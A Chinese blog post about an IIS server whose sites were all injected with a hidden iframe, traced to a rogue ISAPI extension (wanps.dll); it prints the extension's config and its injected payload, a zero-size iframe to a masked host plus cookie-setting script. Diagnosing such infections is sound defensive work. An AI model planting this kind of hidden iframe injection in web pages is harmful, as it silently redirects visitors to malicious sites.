HTMer » 网站建设 » 做了安全配置的IIS服务器仍被挂马问题探讨

做了安全配置的IIS服务器仍被挂马问题探讨

最新,笔者单位有台服务器,全服务器所有网站都被挂马(前提是笔者已经做了FSO安全配置,每个网站都设定单独访问用户),不仅是ASP文件被挂马,甚至有些HTML文件也被挂马,查看源代码中却找不到挂马的代码。被挂马的网站头部都显示如下形式的代码:

<iframe src="http://xxx.xxx/xxx height=0 width=0></iframe>

起初怀疑是JS代码搞鬼,查看服务器上所有JS文件,找了半天也没发现。于是我就新建一个HTML文件,然后浏览,依然有上面形式的代码(我晕~~~怀疑自己机子中木马,换台机器依然如此,而且上其他网站好的)。

实在是没折了,打开IIS看看呢,问题找到了,在主IIS上,右击【属性】,在ISAPI里发现一个ISAPI扩展,从没见过的,路径为:C:\WINDOWS\Help\wanps.dll,加载正常,取消此ISAPI扩展,重新启动IIS后,所有代码消失,问题到此解决,就是这个ISAPI扩展搞的鬼,下面来瞧瞧加载项的具体内容:

wanps.ini内容为:
Cookie=GAG5=ABCDEFG
Redirector=C:\windows\help\wanps.txt
wanps.txt内容为:
<body>
<iframe src="http://xxx.xxx/xxx height=0 width=0></iframe>
<script language="javascript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
document.cookie="GAG5=ABCDEFG;expires="+expires.toGMTString();
-->
</script>
</body>
顶一下 ▲()   踩一下 ▼()

相关文章